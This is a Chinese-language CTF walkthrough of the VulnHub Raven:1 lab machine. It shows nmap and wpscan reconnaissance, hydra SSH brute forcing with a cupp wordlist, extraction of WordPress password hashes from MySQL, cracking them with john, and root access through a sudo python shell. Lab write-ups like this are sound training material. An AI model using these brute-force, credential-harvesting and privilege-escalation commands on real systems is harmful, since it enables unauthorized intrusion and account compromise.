0x01 Scan Host
nmap -p 80,22,21,25,3389,443 192.168.8.0/24ornetdiscover 192.168.8.0/24
![图片[1]-Vulnhub靶机渗透-Raven:1(渗透靶机如何搭建)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128072-1586844684.png)
来更加深入的扫描一下:
nmap -sS -sV -T5 -A -p- 192.168.8.156
![图片[2]-Vulnhub靶机渗透-Raven:1(渗透靶机如何搭建)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128072-15868446841.png)
0x02 Web Service
![图片[3]-Vulnhub靶机渗透-Raven:1(渗透靶机如何搭建)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128072-1586844685.png)
flag1
![图片[4]-Vulnhub靶机渗透-Raven:1(渗透靶机如何搭建)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128072-1586844687.png)
首先大致浏览了一遍,发现有个wordpress(建议把域名加入hosts):
![图片[5]-Vulnhub靶机渗透-Raven:1(渗透靶机如何搭建)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128072-1586844688.png)
用户名MICHAEL,既然是wp那就用wpscan,先更新下漏洞库:
wpscan --updatewpscan --url http://raven.local/wordpress/
![图片[6]-Vulnhub靶机渗透-Raven:1(渗透靶机如何搭建)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128072-1586844689.png)
-
WordPress version 4.8.12
-
Theme twentysenventeen version 1.3
![图片[7]-Vulnhub靶机渗透-Raven:1(渗透靶机如何搭建)-Pikachu Hacker](/wp-content/themes/zibll/img/thumbnail-lg.svg)
![图片[7]-Vulnhub靶机渗透-Raven:1(渗透靶机如何搭建)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2020/04/image32.png)
同时这个主题也没有发现有什么东西,所以考虑爆一下后台(字典无果可cewl生成):
爆破的同时我进行了0x03的操作,拿到michael的ssh账号后,可以直接写入shell,并且还没有爆出后台密码,所以停止。
0x03 SSH Service
Open SSH 6.7p1
并没有发现对应版本的Vunerability,用hydra爆一下:
hydra -l michael -P /usr/share/wordlists/fasttrack.txt ssh://raven.local
并没有爆出密码,这里用cupp生成一个新的字典:
cupp -i
![图片[8]-Vulnhub靶机渗透-Raven:1(渗透靶机如何搭建)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128072-1586844690.png)
因为我们只知道目标姓名,其他一概不知,所以没有就回车.
![图片[9]-Vulnhub靶机渗透-Raven:1(渗透靶机如何搭建)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128072-1586844691.png)
爆出了密码,进入看看吧。
0x04 Privilege Escalation
michael@Raven:~$ uname -aLinux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux
![图片[10]-Vulnhub靶机渗透-Raven:1(渗透靶机如何搭建)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128072-15868446911.png)
没什么可以利用的,再看一下SUID:
![图片[11]-Vulnhub靶机渗透-Raven:1(渗透靶机如何搭建)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128072-1586844692.png)
没什么可以直接用的,并且michael没有sudo权限,但是发现了flag2.
flag2
![图片[12]-Vulnhub靶机渗透-Raven:1(渗透靶机如何搭建)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128072-15868446921.png)
看一下网站配置文件,或许有root呢?
![图片[13]-Vulnhub靶机渗透-Raven:1(渗透靶机如何搭建)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128072-15868446922.png)
Mysql的root权限,尝试用这个密码去登录ssh,但是并没有成功,登陆steven也没成功.
flag3
wp_content中发现了flag3
select * from wp_postsG
![图片[14]-Vulnhub靶机渗透-Raven:1(渗透靶机如何搭建)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128072-15868446923.png)
所以考虑看一下mysql中存放的wp的密码:
select * from wp_usersG
![图片[15]-Vulnhub靶机渗透-Raven:1(渗透靶机如何搭建)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128072-1586844693.png)
michael:$P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
这直接解肯定解不开了,想用John破解一下(如有shadow和passwd也可用john):
SELECT CONCAT(user_login, ":", user_pass) FROM wp_users INTO OUTFILE '/tmp/wordpress.txt';
我们的字典用著名的rockyou,kali自带的:
root@NightsWatch:/usr/share/wordlists# lsdirb dirbuster fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt.gzroot@NightsWatch:/usr/share/wordlists# gzip -d rockyou.txt.gz
接下来用john:
john --wordlist=/usr/share/wordlists/rockyou.txt wordpress.txt
emmm,先破着吧,要上操作系统原理了……
![图片[16]-Vulnhub靶机渗透-Raven:1(渗透靶机如何搭建)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128072-15868446931.png)
破出了steven的密码,尝试去登录ssh成功,因为前面内核和suid提权均失败,并且michael也没有sudo权限,那么看一下Steven是否有sudo权限:
sudo -l
![图片[17]-Vulnhub靶机渗透-Raven:1(渗透靶机如何搭建)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128072-15868446932.png)
尝试用sudo python执行shell:
sudo python3 -c 'import pty; pty.spawn("/bin/sh")'
![图片[18]-Vulnhub靶机渗透-Raven:1(渗透靶机如何搭建)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128072-15868446933.png)
emmm,失败……另一种:
sudo python -c 'import os; os.system("/bin/sh")'
flag4
![图片[19]-Vulnhub靶机渗透-Raven:1(渗透靶机如何搭建)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128072-1586844694.png)
本次渗透值得注意的地方就是:
-
社会工程学密码字典生成的应用
-
john破解HASH的应用
-
hydra爆破各种协议的应用
-
得到的密码可能通用:例如得到wp的密码可以尝试登陆ssh
-
sudo提权
![图片[20]-Vulnhub靶机渗透-Raven:1(渗透靶机如何搭建)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128072-15868446941.png)
原创投稿作者:Railgun作者博客:www.pwn4fun.com
本文作者:HACK_Learn
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/128072.html
暂无评论内容